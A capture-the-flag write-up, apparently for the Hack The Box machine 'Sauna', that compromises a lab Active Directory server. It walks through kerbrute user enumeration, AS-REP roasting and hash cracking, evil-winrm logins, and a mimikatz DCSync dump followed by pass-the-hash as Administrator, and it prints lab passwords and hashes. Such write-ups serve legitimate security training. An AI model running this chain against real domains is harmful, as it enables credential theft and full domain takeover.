Sauna

Starting off with nmap

nmap -sC -sV -oA nmap/ -T4 10.129.171.194

# Nmap 7.93 scan initiated Sat Feb  4 19:57:04 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.171.194
Nmap scan report for 10.129.171.194
Host is up (0.052s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-05 00:57:17Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2023-02-05T00:57:22
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb  4 19:58:00 2023 -- 1 IP address (1 host up) scanned in 55.31 seconds

Results tell us a lot, there is a web site on port 80, and judging on ports 53,88 we are dealing with Active Directory. Also, there is a domain EGOTISTICAL-BANK.LOCAL0. . Let's add that to our hosts file just in case

127.0.0.1       localhost

127.0.1.1       joonas-VirtualBox

# The following lines are desirable for IPv6 capable hosts

::1     ip6-localhost ip6-loopback

fe00::0 ip6-localnet

ff00::0 ip6-mcastprefix

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

10.129.138.100  eforenzics.htb

10.129.171.194  EGOTISTICAL-BANK.LOCAL EGOISTICAL-BANK.LOCAL0 >

The web page has an about page with some members of the team.

about-page

Nothing groundbreaking but some of them could have accounts on the server. Let's create a simple wordlist of them. Common naming scheme could be in format firstname.lastname or first letter of the firstname followed by lastname. The wordlist could be like this:

fergus.smith
f.smith
fsmith
shaun.cois
s.cois
scois
hugo.bear
h.bear
hbear
bowie.taylor
b.taylor
btaylor
sophie.driver
s.driver
sdriver
steven.kerb
s.kerb
skerb

Let's save that on a file called users.txt and use kerbrute to check if any of them are valid.

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL users.txt  --dc 10.129.171.194

We got one user!

kerbrute-results

Next, we could check if that user is Kerberoastable using Impacket. First, create a file called user.txt and store fsmith on it and then run 

GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.171.194 -usersfile user.txt -format hashcat -outputfile hashes.txt

We get a hash!

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b5bb182b0566624d92c2dc3730913e83$46f35af25be50bd9ef384598fb51991de8af3f8e74a3f6116586fb75ea48b1f7f9c732da6779111a20666014900bf1935deec5ac25e5a4059d24f2bc8ea3cf6a791e8e3ee48c6dc868edc7b949f63e7e3012c0ae16ee104383f1b9b11c3518c8fa5c12724386a88c7e9d0161665871b511fd07bd0dff2f372082d0ae737c699eacf724cec9e742d1950c151e6560be53b698823106f390c67e6db41b9ec6a0c41c597eb0a1d177cc3519c78c6f86cb02fa1e6551ceacdb01540ab6531f1b868c263dbdcf7f4e194cf69ee9e4c772640c4fc065d5928bcc7f4107853764ad5adcf9e9ef19824418c45bf6391c7ae1248d91ffa77d654cc3993e1d3e329d4b9bb3

This can be cracked with hashcat:

.\hashcat.exe .\hash.txt .\rockyou.txt

We get the password: 'Thestrokes23'. Now we can access the server via evil-winrm:

evil-winrm -u fsmith -p Thestrokes23 -i 10.129.171.194

Running winPEAS Reveals us some auto logon creds:

winpeas

Interestingly, there is no user svcloanmanager on the server but svcloanmgr exists. We can login on his credentials via evil-winr:

evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.129.171.194

Next, let's use Bloodhound to enumerate some more. upload SharpHound to the server and run it:

upload SharpHound.exe
....
./SharpHound.exe

Now, Bloodhound reveals us something nice:

bloodhound

Basically, we can use dcsync attack and get hashes using mimikatz or similiar tool. Let's try that out. Upload mimikatz to it and run it

upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit

mimikatz

We got Administrators hash! We can use this to login to the server as administrator:

evil-winrm  -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.129.171.194

GGs